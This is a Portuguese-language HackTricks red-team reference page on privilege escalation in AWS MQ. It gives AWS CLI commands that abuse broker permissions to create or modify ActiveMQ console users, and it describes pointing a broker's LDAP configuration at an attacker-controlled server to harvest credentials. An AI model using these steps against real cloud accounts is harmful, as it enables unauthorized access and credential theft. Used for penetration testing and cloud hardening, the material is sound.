AWS - MQ Privesc

Reading time: 3 minutes

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

MQ

Para mais informações sobre MQ, consulte:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Com essas permissões você pode criar um novo usuário em um broker ActimeMQ (isso não funciona no RabbitMQ):

bash
aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impacto potencial: Acessar informações sensíveis navegando pelo ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Com essas permissões você pode criar um novo usuário em um broker ActimeMQ (isso não funciona no RabbitMQ):

bash
aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impacto Potencial: Acessar informações sensíveis ao navegar pelo ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Se um broker estiver usando LDAP para autorização com ActiveMQ, é possível alterar a configuração do servidor LDAP usado para um controlado pelo atacante. Dessa forma o atacante poderá roubar todas as credenciais enviadas via LDAP.

bash
aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Se você, de alguma forma, conseguir encontrar as credenciais originais usadas pelo ActiveMQ, poderá realizar um MitM, roubar as creds, usá-las no servidor original e enviar a resposta (talvez apenas reutilizando as credenciais roubadas você consiga fazer isso).

Impacto potencial: Roubar credenciais do ActiveMQ

tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks